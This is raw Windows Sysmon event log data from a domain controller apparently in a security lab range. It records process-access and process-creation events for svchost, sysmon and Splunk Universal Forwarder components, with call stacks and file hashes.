13:40:47.193{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004754Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:40:47.193{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004753Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:40:47.193{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004752Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:40:47.193{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004751Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:40:47.193{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004750Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:40:47.193{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004749Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:40:47.193{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004748Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:40:47.193{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-8FDF-6005-0401-00000000A301}1808C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000004747Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:40:47.193{59A5CD1D-8EE3-6005-B100-00000000A301}41243752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{59A5CD1D-8FDF-6005-0401-00000000A301}1808C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000004746Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:40:47.194{59A5CD1D-8FDF-6005-0401-00000000A301}1808C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000004787Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:40:48.849{59A5CD1D-8FE0-6005-0601-00000000A301}48125004C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004786Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:40:48.708{59A5CD1D-8EE3-6005-B500-00000000A301}28363856C:\Windows\system32\conhost.exe{59A5CD1D-8FE0-6005-0601-00000000A301}4812C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004785Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:40:48.708{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004784Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:40:48.708{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004783Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:40:48.708{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004782Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:40:48.708{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004781Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:40:48.708{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004780Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:40:48.708{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004779Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:40:48.708{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004778Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:40:48.708{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004777Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:40:48.708{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004776Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:40:48.708{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-8FE0-6005-0601-00000000A301}4812C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000004775Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:40:48.708{59A5CD1D-8EE3-6005-B100-00000000A301}41243752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{59A5CD1D-8FE0-6005-0601-00000000A301}4812C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000004774Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:40:48.709{59A5CD1D-8FE0-6005-0601-00000000A301}4812C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000004773Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:40:48.177{59A5CD1D-8FE0-6005-0501-00000000A301}36762572C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004772Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:40:48.036{59A5CD1D-8EE3-6005-B500-00000000A301}28363856C:\Windows\system32\conhost.exe{59A5CD1D-8FE0-6005-0501-00000000A301}3676C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004771Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:40:48.036{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 